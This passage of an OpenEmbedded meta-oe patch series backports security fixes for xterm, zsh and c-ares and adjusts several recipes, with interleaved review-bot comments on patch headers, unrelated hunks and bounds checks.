XTermFonts * /* result */, XTermFonts * /* current */, Bool /* force */); + extern XFontStruct * xtermLoadQueryFont(XtermWidget /* xw */, const char * /*name */); + extern XTermFonts * getDoubleFont (TScreen * /* screen */, int /* which */); + extern XTermFonts * getItalicFont (TScreen * /* screen */, int /* which */); +@@ -51,7 +51,7 @@ extern int lookupRelativeFontSize (XtermWidget /* xw */, int /* old */, int /* r + extern int xtermGetFont (const char * /* param */); + extern int xtermLoadFont (XtermWidget /* xw */, const VTFontNames */* fonts */, Bool /* doresize */, int /* fontnum */); + extern void HandleSetFont PROTO_XT_ACTIONS_ARGS; +-extern void SetVTFont (XtermWidget /* xw */, int /* i */, Bool /* doresize */, const VTFontNames */* fonts */); ++extern Bool SetVTFont (XtermWidget /* xw */, int /* i */, Bool /* doresize */, const VTFontNames */* fonts */); + extern void allocFontList (XtermWidget /* xw */, const char * /* name */, XtermFontNames * /* target */, VTFontEnum /* which */, const char * /* source */, Bool /* ttf */); + extern void copyFontList (char *** /* targetp */, char ** /* source */); + extern void initFontLists (XtermWidget /* xw */); +diff --git a/misc.c b/misc.c +index cbb2679..aafbb08 100644 +--- a/misc.c ++++ b/misc.c +@@ -3941,9 +3941,9 @@ ChangeFontRequest(XtermWidget xw, String buf) + { + memset(&fonts, 0, sizeof(fonts)); + fonts.f_n = name; +- SetVTFont(xw, num, True, &fonts); +- if (num == screen->menu_font_number && +- num != fontMenu_fontescape) { ++ if (SetVTFont(xw, num, True, &fonts) ++ && num == screen->menu_font_number ++ && num != fontMenu_fontescape) { + screen->EscapeFontName() = x_strdup(name); + } + } +@@ -6422,7 +6422,6 @@ xtermSetenv(const char *var, const char *value) + + found = envindex; + environ[found + 1] = NULL; +- environ = environ; + } + + environ[found] = malloc(2 + len + strlen(value)); +diff --git a/screen.c b/screen.c +index 93e36b3..f82ee44 100644 +--- a/screen.c ++++ b/screen.c +@@ -1454,7 +1454,7 @@ 
ScrnRefresh(XtermWidget xw, + maxrow += StatusLineRows; + } + #endif +- ++ (void) recurse; + ++recurse; + + if (screen->cursorp.col >= leftcol +diff --git a/xterm.h b/xterm.h +index e6bd123..c4fe811 100644 +--- a/xterm.h ++++ b/xterm.h +@@ -999,7 +999,7 @@ extern Bool CheckBufPtrs (TScreen * /* screen */); + extern Bool set_cursor_gcs (XtermWidget /* xw */); + extern char * vt100ResourceToString (XtermWidget /* xw */, const char * /* name */); + extern int VTInit (XtermWidget /* xw */); +-extern void FindFontSelection (XtermWidget /* xw */, const char * /* atom_name */, Bool /* justprobe */); ++extern Bool FindFontSelection (XtermWidget /* xw */, const char * /* atom_name */, Bool /* justprobe */); + extern void HideCursor (XtermWidget /* xw */); + extern void RestartBlinking(XtermWidget /* xw */); + extern void ShowCursor (XtermWidget /* xw */); +diff --git a/xterm.log.html b/xterm.log.html +index 03324b1..0f28658 100644 +--- a/xterm.log.html ++++ b/xterm.log.html +@@ -1026,6 +1026,12 @@ + 2022/03/09</a></h1> + + <ul> ++ <li>improve error-recovery when setting a bitmap font for the ++ VT100 window, e.g., in case <em>OSC 50</em> failed, ++ restoring the most recent valid font so that a subsequent ++ <em>OSC 50</em> reports this correctly (report by David ++ Leadbeater).</li> ++ + <li>amend allocation/freeing of scrollback lines, eliminating + an adjustment for status-line added in <a href= + "#xterm_371">patch #371</a> (report/testcase by Rajeev V. +-- +2.25.1 + diff --git a/meta-oe/recipes-graphics/xorg-app/xterm_372.bb b/meta-oe/recipes-graphics/xorg-app/xterm_372.bb index 3e1e9d7042..223bc0a498 100644 --- a/meta-oe/recipes-graphics/xorg-app/xterm_372.bb +++ b/meta-oe/recipes-graphics/xorg-app/xterm_372.bb 
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://xterm.h;beginline=3;endline=31;md5=5ec6748ed90e588caa SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \ file://0001-Add-configure-time-check-for-setsid.patch \ + file://CVE-2022-45063.patch \ " SRC_URI[sha256sum] = "c6d08127cb2409c3a04bcae559b7025196ed770bb7bf26630abcb45d95f60ab1" diff --git a/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb b/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb index 2ab5297949..a5271f08bd 100644 --- a/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb +++ b/meta-oe/recipes-graphics/xscreensaver/xscreensaver_6.01.bb @@ -6,6 +6,8 @@ LIC_FILES_CHKSUM = "file://driver/xscreensaver.h;endline=10;md5=c3ce41cdff745eb1 SRC_URI = "https://www.jwz.org/${BPN}/${BP}.tar.gz" SRC_URI[sha256sum] = "085484665d91f60b4a1dedacd94bcf9b74b0fb096bcedc89ff1c245168e5473b" +MIRRORS += "https://www.jwz.org/${BPN} https://ftp.osuosl.org/pub/blfs/conglomeration/${BPN}" + SRC_URI += " \ file://xscreensaver.service \ file://0001-build-Do-not-build-po-files.patch \ diff --git a/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb b/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb index 461e6b05ed..5f687b27b3 100644 --- a/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb +++ b/meta-oe/recipes-kernel/libbpf/libbpf_0.7.0.bb @@ -17,6 +17,7 @@ COMPATIBLE_HOST = "(x86_64|i.86|aarch64|riscv64|powerpc64).*-linux" S = "${WORKDIR}/git/src" EXTRA_OEMAKE += "DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir}" +EXTRA_OEMAKE:append:class-native = " UAPIDIR=${includedir}" inherit pkgconfig @@ -27,3 +28,9 @@ do_compile() { do_install() { oe_runmake install } + +do_install:append:class-native() { + oe_runmake install_uapi_headers +} + +BBCLASSEXTEND = "native nativesdk" 
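Review bot: The `CVE-2022-45063.patch` that this SRC_URI line pulls in carries hunks that do not look related to the font-load recovery it is named for. Examples are `(void) added; (void) actual;` in findXftGlyph, the removal of `environ = environ;` in xtermSetenv, and `(void) recurse;` in ScrnRefresh. Mixing cleanups into a security backport makes it harder to audit and to rebase when the recipe is upgraded. Either trim those hunks or record them in the patch header, for instance `Comment: also carries upstream warning cleanups in fontutils.c, misc.c and screen.c`. The patch header sits before the part of the page shown here, so it may already say this.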
diff --git a/meta-oe/recipes-multimedia/jack/jack/0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch b/meta-oe/recipes-multimedia/jack/jack/0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch new file mode 100644 index 0000000000..d3b203111f --- /dev/null +++ b/meta-oe/recipes-multimedia/jack/jack/0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch 
@@ -0,0 +1,52 @@ +From 415d50fc56b82963e5570c7738c61b22f4a83748 Mon Sep 17 00:00:00 2001 +From: Daan De Meyer <daan.j.demeyer@gmail.com> +Date: Mon, 11 Jul 2022 00:56:28 +0200 +Subject: [PATCH] Remove usage of 'U' mode bit for opening files in python + +The 'U' mode bit is removed in python 3.11. It has been +deprecated for a long time. The 'U' mode bit has no effect +so this change doesn't change any behavior. + +See https://docs.python.org/3.11/whatsnew/3.11.html#changes-in-the-python-api + +Upstream-Status: Submitted [https://github.com/jackaudio/jack2/pull/884] +--- + waflib/ConfigSet.py | 2 +- + waflib/Context.py | 4 ++-- + 2 files changed, 3 insertions(+), 3 deletions(-) + +diff --git a/waflib/ConfigSet.py b/waflib/ConfigSet.py +index b300bb56..84736c9c 100644 +--- a/waflib/ConfigSet.py ++++ b/waflib/ConfigSet.py +@@ -312,7 +312,7 @@ class ConfigSet(object): + :type filename: string + """ + tbl = self.table +- code = Utils.readf(filename, m='rU') ++ code = Utils.readf(filename, m='r') + for m in re_imp.finditer(code): + g = m.group + tbl[g(2)] = eval(g(3)) +diff --git a/waflib/Context.py b/waflib/Context.py +index 9fee3fa1..761b521f 100644 +--- a/waflib/Context.py ++++ b/waflib/Context.py +@@ -266,7 +266,7 @@ class Context(ctx): + cache[node] = True + self.pre_recurse(node) + try: +- function_code = node.read('rU', encoding) ++ function_code = node.read('r', encoding) + exec(compile(function_code, node.abspath(), 'exec'), self.exec_dict) + finally: + self.post_recurse(node) +@@ -662,7 +662,7 @@ def load_module(path, encoding=None): + + module = imp.new_module(WSCRIPT_FILE) + try: +- code = Utils.readf(path, m='rU', encoding=encoding) ++ code = Utils.readf(path, m='r', encoding=encoding) + except EnvironmentError: + raise Errors.WafError('Could not read the file %r' % path) + diff --git a/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb b/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb index 452f066559..ea8c0f385a 100644 
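Review bot: `load_module` in waflib/Context.py still calls `imp.new_module(WSCRIPT_FILE)`, visible in the context lines of the last hunk, and the `imp` module is removed in Python 3.12, so this patch covers the 3.11 breakage only. The build is likely to fail again at the next host Python bump unless that call is replaced, for example with `module = types.ModuleType(WSCRIPT_FILE)` plus an `import types`, or the bundled waf is refreshed. The body of `load_module` continues outside the hunk, so other uses of `imp` cannot be ruled out from here. The patch header also has no `Signed-off-by:` line, which the zsh and c-ares patches added in this commit do carry.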
--- a/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb +++ b/meta-oe/recipes-multimedia/jack/jack_1.19.20.bb @@ -14,7 +14,9 @@ LIC_FILES_CHKSUM = " \ DEPENDS = "libsamplerate0 libsndfile1 readline" -SRC_URI = "git://github.com/jackaudio/jack2.git;branch=master;protocol=https" +SRC_URI = "git://github.com/jackaudio/jack2.git;branch=master;protocol=https \ + file://0001-Remove-usage-of-U-mode-bit-for-opening-files-in-pyth.patch \ +" SRCREV = "a2fe7ec2fdbd315f112c8035282d94a429451178" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_1.patch b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_1.patch new file mode 100644 index 0000000000..fb8fa3427f --- /dev/null +++ b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_1.patch 
@@ -0,0 +1,60 @@ +Origin: commit c187154f47697cdbf822c2f9d714d570ed4a0fd1 +From: Oliver Kiddle <opk@zsh.org> +Date: Wed, 15 Dec 2021 01:56:40 +0100 +Subject: [PATCH 1/9] security/41: Don't perform PROMPT_SUBST evaluation on + %F/%K arguments + +Mitigates CVE-2021-45444 + +https://salsa.debian.org/debian/zsh/-/raw/debian/5.8-6+deb11u1/debian/patches/cherry-pick-CVE-2021-45444_1.patch?inline=false +Upstream-Status: Backport +CVE: CVE-2021-45444 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + ChangeLog | 5 +++++ + Src/prompt.c | 10 ++++++++++ + 2 files changed, 15 insertions(+) + +diff --git a/ChangeLog b/ChangeLog +index 8d7dfc169..eb248ec06 100644 +--- a/ChangeLog ++++ b/ChangeLog +@@ -1,3 +1,8 @@ ++2022-01-27 dana <dana@dana.is> ++ ++ * Oliver Kiddle: security/41: Src/prompt.c: Prevent recursive ++ PROMPT_SUBST ++ + 2020-02-14 dana <dana@dana.is> + + * unposted: Config/version.mk: Update for 5.8 +diff --git a/Src/prompt.c b/Src/prompt.c +index b65bfb86b..91e21c8e9 100644 +--- a/Src/prompt.c ++++ b/Src/prompt.c +@@ -244,6 +244,12 @@ parsecolorchar(zattr arg, int is_fg) + bv->fm += 2; /* skip over F{ */ + if ((ep = strchr(bv->fm, '}'))) { + char oc = *ep, *col, *coll; ++ int ops = opts[PROMPTSUBST], opb = opts[PROMPTBANG]; ++ int opp = opts[PROMPTPERCENT]; ++ ++ opts[PROMPTPERCENT] = 1; ++ opts[PROMPTSUBST] = opts[PROMPTBANG] = 0; ++ + *ep = '\0'; + /* expand the contents of the argument so you can use + * %v for example */ +@@ -252,6 +258,10 @@ parsecolorchar(zattr arg, int is_fg) + arg = match_colour((const char **)&coll, is_fg, 0); + free(col); + bv->fm = ep; ++ ++ opts[PROMPTSUBST] = ops; ++ opts[PROMPTBANG] = opb; ++ opts[PROMPTPERCENT] = opp; + } else { + arg = match_colour((const char **)&bv->fm, is_fg, 0); + if (*bv->fm != '}') +-- +2.34.1 diff --git a/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_2.patch b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_2.patch new file mode 100644 index 0000000000..e5b6d7cdc9 --- /dev/null 
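Review bot: The `Upstream-Status: Backport` tag in this patch header names no source in brackets; the Debian link sits on a separate line above it, and CVE-2021-45444_2.patch and CVE-2021-45444_3.patch are written the same way. The c-ares patch in this commit uses the form `Upstream-Status: Backport [URL]`, which keeps the origin of a security fix on the tag itself where header checks and auditors look for it. Folding the link into the tag, `Upstream-Status: Backport [<the salsa.debian.org link from the line above>]`, would make the three zsh headers consistent. Since the `Origin:` line already names the upstream commit, pointing the tag at upstream rather than at the Debian packaging would be more direct still.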
+++ b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_2.patch 
@@ -0,0 +1,140 @@ +From 8a4d65ef6d0023ab9b238529410afb433553d2fa Mon Sep 17 00:00:00 2001 +From: Marc Cornellà <hello@mcornella.com> +Date: Mon, 24 Jan 2022 09:43:28 +0100 +Subject: [PATCH 2/9] security/89: Add patch which can optionally be used to + work around CVE-2021-45444 in VCS_Info +Comment: Updated to use the same file name without blanks as actually + used in the final 5.8.1 release. + + +https://salsa.debian.org/debian/zsh/-/blob/debian/5.8-6+deb11u1/debian/patches/cherry-pick-CVE-2021-45444_2.patch +Upstream-Status: Backport +CVE: CVE-2021-45444 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + ChangeLog | 5 + + Etc/CVE-2021-45444-VCS_Info-workaround.patch | 98 ++++++++++++++++++++ + 2 files changed, 103 insertions(+) + create mode 100644 Etc/CVE-2021-45444-VCS_Info-workaround.patch + +diff --git a/ChangeLog b/ChangeLog +index eb248ec06..9a05a09e1 100644 +--- a/ChangeLog ++++ b/ChangeLog +@@ -1,5 +1,10 @@ + 2022-01-27 dana <dana@dana.is> + ++ * Marc Cornellà: security/89: ++ Etc/CVE-2021-45444-VCS_Info-workaround.patch: Add patch which ++ can optionally be used to work around recursive PROMPT_SUBST ++ issue in VCS_Info ++ + * Oliver Kiddle: security/41: Src/prompt.c: Prevent recursive + PROMPT_SUBST + +diff --git a/Etc/CVE-2021-45444-VCS_Info-workaround.patch b/Etc/CVE-2021-45444-VCS_Info-workaround.patch +new file mode 100644 +index 000000000..13e54be77 +--- /dev/null ++++ b/Etc/CVE-2021-45444-VCS_Info-workaround.patch +@@ -0,0 +1,98 @@ ++From 972887bbe5eb6a00e5f0e73781d6d73bfdcafb93 Mon Sep 17 00:00:00 2001 ++From: =?UTF-8?q?Marc=20Cornell=C3=A0?= <hello@mcornella.com> ++Date: Mon, 24 Jan 2022 09:43:28 +0100 ++Subject: [PATCH] security/89: Partially work around CVE-2021-45444 in VCS_Info ++MIME-Version: 1.0 ++Content-Type: text/plain; charset=UTF-8 ++Content-Transfer-Encoding: 8bit ++ ++This patch is a partial, VCS_Info-specific work-around for CVE-2021-45444, ++which is mitigated in the shell itself in 5.8.1 and later versions. 
It is ++offered for users who are concerned about an exploit but are unable to update ++their binaries to receive the complete fix. ++ ++The patch works around the vulnerability by pre-escaping values substituted ++into format strings in VCS_Info. Please note that this may break some user ++configurations that rely on those values being un-escaped (which is why it was ++not included directly in 5.8.1). It may be possible to limit this breakage by ++adjusting exactly which ones are pre-escaped, but of course this may leave ++them vulnerable again. ++ ++If applying the patch to the file system is inconvenient or not possible, the ++following script can be used to idempotently patch the relevant function ++running in memory (and thus must be re-run when the shell is restarted): ++ ++ ++# Impacted versions go from v5.0.3 to v5.8 (v5.8.1 is the first patched version) ++autoload -Uz is-at-least ++if is-at-least 5.8.1 || ! is-at-least 5.0.3; then ++ return ++fi ++ ++# Quote necessary $hook_com[<field>] items just before they are used ++# in the line "VCS_INFO_hook 'post-backend'" of the VCS_INFO_formats ++# function, where <field> is: ++# ++# base: the full path of the repository's root directory. ++# base-name: the name of the repository's root directory. ++# branch: the name of the currently checked out branch. ++# revision: an identifier of the currently checked out revision. ++# subdir: the path of the current directory relative to the ++# repository's root directory. ++# misc: a string that may contain anything the vcs_info backend wants. ++# ++# This patch %-quotes these fields previous to their use in vcs_info hooks and ++# the zformat call and, eventually, when they get expanded in the prompt. ++# It's important to quote these here, and not later after hooks have modified the ++# fields, because then we could be quoting % characters from valid prompt sequences, ++# like %F{color}, %B, etc. 
++# ++# 32 │ hook_com[subdir]="$(VCS_INFO_reposub ${hook_com[base]})" ++# 33 │ hook_com[subdir_orig]="${hook_com[subdir]}" ++# 34 │ ++# 35 + │ for tmp in base base-name branch misc revision subdir; do ++# 36 + │ hook_com[$tmp]="${hook_com[$tmp]//\%/%%}" ++# 37 + │ done ++# 38 + │ ++# 39 │ VCS_INFO_hook 'post-backend' ++# ++# This is especially important so that no command substitution is performed ++# due to malicious input as a consequence of CVE-2021-45444, which affects ++# zsh versions from 5.0.3 to 5.8. ++# ++autoload -Uz +X regexp-replace VCS_INFO_formats ++ ++# We use $tmp here because it's already a local variable in VCS_INFO_formats ++typeset PATCH='for tmp (base base-name branch misc revision subdir) hook_com[$tmp]="${hook_com[$tmp]//\%/%%}"' ++# Unique string to avoid reapplying the patch if this code gets called twice ++typeset PATCH_ID=vcs_info-patch-9b9840f2-91e5-4471-af84-9e9a0dc68c1b ++# Only patch the VCS_INFO_formats function if not already patched ++if [[ "$functions[VCS_INFO_formats]" != *$PATCH_ID* ]]; then ++ regexp-replace 'functions[VCS_INFO_formats]' \ ++ "VCS_INFO_hook 'post-backend'" \ ++ ': ${PATCH_ID}; ${PATCH}; ${MATCH}' ++fi ++unset PATCH PATCH_ID ++ ++ ++--- ++ Functions/VCS_Info/VCS_INFO_formats | 4 ++++ ++ 1 file changed, 4 insertions(+) ++ ++diff --git a/Functions/VCS_Info/VCS_INFO_formats b/Functions/VCS_Info/VCS_INFO_formats ++index e0e1dc738..4d88e28b6 100644 ++--- a/Functions/VCS_Info/VCS_INFO_formats +++++ b/Functions/VCS_Info/VCS_INFO_formats ++@@ -32,6 +32,10 @@ hook_com[base-name_orig]="${hook_com[base_name]}" ++ hook_com[subdir]="$(VCS_INFO_reposub ${hook_com[base]})" ++ hook_com[subdir_orig]="${hook_com[subdir]}" ++ +++for tmp in base base-name branch misc revision subdir; do +++ hook_com[$tmp]="${hook_com[$tmp]//\%/%%}" +++done +++ ++ VCS_INFO_hook 'post-backend' ++ ++ ## description (for backend authors): ++-- ++2.34.1 +-- +2.34.1 
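Review bot: This patch only creates `Etc/CVE-2021-45444-VCS_Info-workaround.patch` inside the zsh source tree; nothing in the recipe hunk applies that inner patch, so the `%`-escaping of the `hook_com` fields in `VCS_INFO_formats` is not part of the built package. As far as the page shows, the image therefore relies on the `Src/prompt.c` change from CVE-2021-45444_1.patch alone. That matches the embedded description of the workaround as optional, but it is easy to misread from the file name in SRC_URI. A header line would make it explicit, e.g. `Comment: adds the optional workaround file only; VCS_INFO_formats itself is not modified by this recipe`.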
diff --git a/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_3.patch b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_3.patch new file mode 100644 index 0000000000..adfc00ae57 --- /dev/null +++ b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_3.patch 
@@ -0,0 +1,77 @@ +From 4abf2fc193fc2f3e680deecbf81289a7b02e245b Mon Sep 17 00:00:00 2001 +From: dana <dana@dana.is> +Date: Tue, 21 Dec 2021 13:13:33 -0600 +Subject: [PATCH 3/9] CVE-2021-45444: Update NEWS/README + +https://salsa.debian.org/debian/zsh/-/blob/debian/5.8-6+deb11u1/debian/patches/cherry-pick-CVE-2021-45444_3.patch +Upstream-Status: Backport +CVE: CVE-2021-45444 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + ChangeLog | 2 ++ + NEWS | 20 ++++++++++++++++++++ + README | 6 ++++++ + 3 files changed, 28 insertions(+) + +diff --git a/ChangeLog b/ChangeLog +index 9a05a09e1..93b0bc337 100644 +--- a/ChangeLog ++++ b/ChangeLog +@@ -1,5 +1,7 @@ + 2022-01-27 dana <dana@dana.is> + ++ * CVE-2021-45444: NEWS, README: Document preceding two changes ++ + * Marc Cornellà: security/89: + Etc/CVE-2021-45444-VCS_Info-workaround.patch: Add patch which + can optionally be used to work around recursive PROMPT_SUBST +diff --git a/NEWS b/NEWS +index 964e1633f..d34b3f79e 100644 +--- a/NEWS ++++ b/NEWS +@@ -4,6 +4,26 @@ CHANGES FROM PREVIOUS VERSIONS OF ZSH + + Note also the list of incompatibilities in the README file. + ++Changes since 5.8 ++----------------- ++ ++CVE-2021-45444: Some prompt expansion sequences, such as %F, support ++'arguments' which are themselves expanded in case they contain colour ++values, etc. This additional expansion would trigger PROMPT_SUBST ++evaluation, if enabled. This could be abused to execute code the user ++didn't expect. e.g., given a certain prompt configuration, an attacker ++could trick a user into executing arbitrary code by having them check ++out a Git branch with a specially crafted name. ++ ++This is fixed in the shell itself by no longer performing PROMPT_SUBST ++evaluation on these prompt-expansion arguments. 
++ ++Users who are concerned about an exploit but unable to update their ++binaries may apply the partial work-around described in the file ++'Etc/CVE-2021-45444 VCS_Info workaround.patch' included with the shell ++source. [ Reported by RyotaK <security@ryotak.me>. Additional thanks to ++Marc Cornellà <hello@mcornella.com>. ] ++ + Changes since 5.7.1-test-3 + -------------------------- + +diff --git a/README b/README +index 7f1dd5f92..c9e994ab3 100644 +--- a/README ++++ b/README +@@ -31,6 +31,12 @@ Zsh is a shell with lots of features. For a list of some of these, see the + file FEATURES, and for the latest changes see NEWS. For more + details, see the documentation. + ++Incompatibilities since 5.8 ++--------------------------- ++ ++PROMPT_SUBST expansion is no longer performed on arguments to prompt- ++expansion sequences such as %F. ++ + Incompatibilities since 5.7.1 + ----------------------------- + +-- +2.34.1 diff --git a/meta-oe/recipes-shells/zsh/zsh_5.8.bb b/meta-oe/recipes-shells/zsh/zsh_5.8.bb index 0429cb9cc7..7602ff9f64 100644 --- a/meta-oe/recipes-shells/zsh/zsh_5.8.bb +++ b/meta-oe/recipes-shells/zsh/zsh_5.8.bb @@ -10,7 +10,11 @@ LIC_FILES_CHKSUM = "file://LICENCE;md5=1a4c4cda3e8096d2fd483ff2f4514fec" DEPENDS = "ncurses bison-native libcap libpcre gdbm groff-native" -SRC_URI = "${SOURCEFORGE_MIRROR}/project/${BPN}/${BPN}/5.8/${BP}.tar.xz" +SRC_URI = "${SOURCEFORGE_MIRROR}/project/${BPN}/${BPN}/5.8/${BP}.tar.xz \ + file://CVE-2021-45444_1.patch \ + file://CVE-2021-45444_2.patch \ + file://CVE-2021-45444_3.patch \ + " SRC_URI[sha256sum] = "dcc4b54cc5565670a65581760261c163d720991f0d06486da61f8d839b52de27" inherit autotools-brokensep gettext update-alternatives manpages 
@@ -18,8 +22,8 @@ inherit autotools-brokensep gettext update-alternatives manpages EXTRA_OECONF = " \ --bindir=${base_bindir} \ --enable-etcdir=${sysconfdir} \ - --enable-fndir=${datadir}/${PN}/${PV}/functions \ - --enable-site-fndir=${datadir}/${PN}/site-functions \ + --enable-fndir=${datadir}/${BPN}/${PV}/functions \ + --enable-site-fndir=${datadir}/${BPN}/site-functions \ --with-term-lib='ncursesw ncurses' \ --with-tcsetpgrp \ --enable-cap \ diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2022-4904.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2022-4904.patch new file mode 100644 index 0000000000..328075ca64 --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2022-4904.patch 
@@ -0,0 +1,66 @@ +From 9903253c347f9e0bffd285ae3829aef251cc852d Mon Sep 17 00:00:00 2001 +From: hopper-vul <118949689+hopper-vul@users.noreply.github.com> +Date: Wed, 18 Jan 2023 22:14:26 +0800 +Subject: [PATCH] Add str len check in config_sortlist to avoid stack overflow + (#497) + +In ares_set_sortlist, it calls config_sortlist(..., sortstr) to parse +the input str and initialize a sortlist configuration. + +However, ares_set_sortlist has not any checks about the validity of the input str. +It is very easy to create an arbitrary length stack overflow with the unchecked +`memcpy(ipbuf, str, q-str);` and `memcpy(ipbufpfx, str, q-str);` +statements in the config_sortlist call, which could potentially cause severe +security impact in practical programs. + +This commit add necessary check for `ipbuf` and `ipbufpfx` which avoid the +potential stack overflows. + +fixes #496 + +Fix By: @hopper-vul + +CVE: CVE-2022-4904 +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/9903253c347f9e0bffd285ae3829aef251cc852d] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> +--- + src/lib/ares_init.c | 4 ++++ + test/ares-test-init.cc | 2 ++ + 2 files changed, 6 insertions(+) + +diff --git a/src/lib/ares_init.c b/src/lib/ares_init.c +index 51668a5c..3f9cec65 100644 +--- a/src/lib/ares_init.c ++++ b/src/lib/ares_init.c +@@ -1913,6 +1913,8 @@ static int config_sortlist(struct apattern **sortlist, int *nsort, + q = str; + while (*q && *q != '/' && *q != ';' && !ISSPACE(*q)) + q++; ++ if (q-str >= 16) ++ return ARES_EBADSTR; + memcpy(ipbuf, str, q-str); + ipbuf[q-str] = '\0'; + /* Find the prefix */ +@@ -1921,6 +1923,8 @@ static int config_sortlist(struct apattern **sortlist, int *nsort, + const char *str2 = q+1; + while (*q && *q != ';' && !ISSPACE(*q)) + q++; ++ if (q-str >= 32) ++ return ARES_EBADSTR; + memcpy(ipbufpfx, str, q-str); + ipbufpfx[q-str] = '\0'; + str = str2; +diff --git a/test/ares-test-init.cc b/test/ares-test-init.cc +index 63c6a228..ee845181 100644 
+--- a/test/ares-test-init.cc ++++ b/test/ares-test-init.cc +@@ -275,6 +275,8 @@ TEST_F(DefaultChannelTest, SetAddresses) { + + TEST_F(DefaultChannelTest, SetSortlistFailures) { + EXPECT_EQ(ARES_ENODATA, ares_set_sortlist(nullptr, "1.2.3.4")); ++ EXPECT_EQ(ARES_EBADSTR, ares_set_sortlist(channel_, "111.111.111.111*/16")); ++ EXPECT_EQ(ARES_EBADSTR, ares_set_sortlist(channel_, "111.111.111.111/255.255.255.240*")); + EXPECT_EQ(ARES_SUCCESS, ares_set_sortlist(channel_, "xyzzy ; lwk")); + EXPECT_EQ(ARES_SUCCESS, ares_set_sortlist(channel_, "xyzzy ; 0x123")); + } diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31130.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31130.patch new file mode 100644 index 0000000000..3e507f7cda --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31130.patch 
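Review bot: The two guards added to config_sortlist hard-code their limits (`q-str >= 16` and `q-str >= 32`) instead of deriving them from the buffers they protect, so the check and the `memcpy` destination can drift apart if `ipbuf` or `ipbufpfx` is ever resized. The declarations of both buffers are outside the hunk, so the sizes 16 and 32 are presumably theirs. Assuming both are arrays, tying each guard to its buffer keeps the bound correct by construction: `if ((size_t)(q-str) >= sizeof(ipbuf)) return ARES_EBADSTR;`, and likewise with `sizeof(ipbufpfx)`. Because this is a verbatim backport, a one-line comment above each check such as `/* limit must stay below sizeof(ipbuf) */` is the lighter option. The body of config_sortlist starts and ends outside the hunk.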
@@ -0,0 +1,328 @@ +From f22cc01039b6473b736d3bf438f56a2654cdf2b2 Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 22 May 2023 06:51:34 -0400 +Subject: [PATCH] Merge pull request from GHSA-x6mf-cxr9-8q6v + +* Merged latest OpenBSD changes for inet_net_pton_ipv6() into c-ares. +* Always use our own IP conversion functions now, do not delegate to OS + so we can have consistency in testing and fuzzing. +* Removed bogus test cases that never should have passed. +* Add new test case for crash bug found. + +Fix By: Brad House (@bradh352) + +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/f22cc01039b6473b736d3bf438f56a2654cdf2b2.patch] +CVE: CVE-2023-31130 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + src/lib/inet_net_pton.c | 155 ++++++++++++++++++++----------------- + test/ares-test-internal.cc | 7 +- + 2 files changed, 86 insertions(+), 76 deletions(-) + +diff --git a/src/lib/inet_net_pton.c b/src/lib/inet_net_pton.c +index 840de50..fc50425 100644 +--- a/src/lib/inet_net_pton.c ++++ b/src/lib/inet_net_pton.c +@@ -1,19 +1,20 @@ + + /* +- * Copyright (c) 2004 by Internet Systems Consortium, Inc. ("ISC") ++ * Copyright (c) 2012 by Gilles Chehade <gilles@openbsd.org> + * Copyright (c) 1996,1999 by Internet Software Consortium. + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * +- * THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES +- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +- * MERCHANTABILITY AND FITNESS. 
